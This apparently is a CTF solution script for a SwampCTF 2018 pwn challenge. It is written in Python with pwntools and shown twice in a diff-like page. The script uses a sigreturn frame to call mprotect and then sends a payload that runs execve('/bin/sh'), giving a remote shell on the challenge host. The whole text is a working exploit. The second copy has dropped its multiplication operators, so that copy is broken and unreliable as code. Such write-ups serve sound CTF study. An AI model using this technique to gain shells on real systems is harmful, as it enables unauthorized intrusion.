i64 · April 1, 2018 07:02
diff --git a/pwn4.py b/pwn4.py
 from pwn import *

 p = remote('chal1.swampctf.com',1800)

 context.arch='amd64'
 #Sigreturn frame for SYS_mprotect
 frame = SigreturnFrame()
 frame.rax = 10          # SYS_mprotect
 frame.rdi = 0x400000   # addr
 frame.rsi = 0x1000     # len
 frame.rdx = 7           # proto
 frame.rsp = 0x400400   # point new rsp after the code section
 frame.rip = 0x400104   # to the 1st syscall instruction, so we can then read second payload on new stack and execute.
 # syscall (rax = SYS_rt_sigreturn)
 payload1 = p64(0)*3+p64(15)+p64(0)*4+str(frame)
 # syscall (rax = SYS_execve, rsi = rdx = 0, rdi = addr of '/bin/sh' (placed just after the register values)
 payload2 = p64(0)*3+p64(59)+p64(0)*3+p64(0x400440)+'/bin/sh\0'
 print p.recvline().strip()
 p.sendline(payload1)
 p.sendline(payload2)

 p.interactive()
 p.close()
	from pwn import *

	p = remote('chal1.swampctf.com',1800)

	context.arch='amd64'
	#Sigreturn frame for SYS_mprotect
	frame = SigreturnFrame()
	frame.rax = 10 # SYS_mprotect
	frame.rdi = 0x400000 # addr
	frame.rsi = 0x1000 # len
	frame.rdx = 7 # proto
	frame.rsp = 0x400400 # point new rsp after the code section
	frame.rip = 0x400104 # to the 1st syscall instruction, so we can then read second payload on new stack and execute.
	# syscall (rax = SYS_rt_sigreturn)
	payload1 = p64(0)3+p64(15)+p64(0)4+str(frame)
	# syscall (rax = SYS_execve, rsi = rdx = 0, rdi = addr of '/bin/sh' (placed just after the register values)
	payload2 = p64(0)3+p64(59)+p64(0)3+p64(0x400440)+'/bin/sh\0'
	print p.recvline().strip()
	p.sendline(payload1)
	p.sendline(payload2)

	p.interactive()
	p.close()